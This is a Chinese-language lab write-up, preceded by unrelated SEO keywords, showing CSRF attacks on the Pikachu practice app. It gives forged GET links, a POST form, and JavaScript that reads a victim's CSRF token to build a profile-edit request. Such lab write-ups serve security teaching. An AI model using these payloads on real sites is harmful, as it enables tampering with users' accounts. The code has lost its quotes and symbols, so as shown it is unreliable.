建设网站的心得,网站建设属于什么类的采购,制作网站要找什么公司,东莞网站推广外包pikachu-csrf实例
get级别
这里需要同时修改性别、手机、住址、邮箱。 写一个简单的html文件#xff0c;里面伪装修改密码的文字#xff0c;代码如下#xff1a;
htmlbodya hrefhttp://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex…pikachu-csrf实例
get级别
这里需要同时修改性别、手机、住址、邮箱。 写一个简单的html文件里面伪装修改密码的文字代码如下
htmlbodya hrefhttp://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex3phonenum2add2email3submitsubmitpikachu-csrf-get/a/body
/html点击pikachu-csrf-get文字后跳转到pikachu的csrf(get)界面展示修改后的界面。 post级别
这里post请求需要通过表单提交。 写一个简单的html文件里面伪装修改密码的文字代码如下
htmlbodya hrefhttp://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex3phonenum2add2email3submitsubmitpikachu-csrf-get/a/brform methodpost actionhttp://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.phpinput idsex typetext namesex value5 /input idphonenum typetext namephonenum value5 /input idadd typetext nameadd value5 /input idemail typetext nameemail value5 /input idpostsubmit typesubmit namesubmit valuepikachu-csrf-post //form/body/html点击pikachu-csrf-post文字后跳转到pikachu的csrf(post)界面展示修改后的界面。
token级别
这里get请求token。 写一个简单的html文件里面get请求拼接token代码如下
htmlbodya hrefhttp://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex3phonenum2add2email3submitsubmitpikachu-csrf-get/a/brform methodpost actionhttp://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.phpinput idsex typetext namesex value5 /input idphonenum typetext namephonenum value5 /input idadd typetext nameadd value5 /input idemail typetext nameemail value5 /input idpostsubmit typesubmit namesubmit valuepikachu-csrf-post //form/bra hrefjavascript:void(0); onclickinitJS()pikachu-csrf-token/a/bodyscript function initJS(){var theUrl http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php;if(window.XMLHttpRequest) {xmlhttp new XMLHttpRequest();}else{xmlhttp new ActiveXObject(Microsoft.XMLHTTP);}var count 0;xmlhttp.withCredentials true;xmlhttp.onreadystatechangefunction(){if(xmlhttp.readyState 4 xmlhttp.status200){var text xmlhttp.responseText;// 创建一个临时的 div 元素并将 HTML 字符串设置为其 innerHTML var tempDiv document.createElement(div); tempDiv.innerHTML text; // 从临时 div 中查找具有 name 属性为 token 的输入元素 var tokenInput tempDiv.querySelector(input[nametoken]); var token tokenInput.value; console.log(Token Value:, token); // 在控制台输出 token 的值 console.log(count,count);var new_url http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php?sex7phonenum7add7email7tokentokensubmitsubmit;console.log(newurl,new_url); }};xmlhttp.open(GET,theUrl,false);xmlhttp.send();}/script/html点击pikachu-csrf-token文字后在控制台中查看newurl并复制下来输入到浏览器中。 刷新csrf token展示了修改后的信息。 破解成功
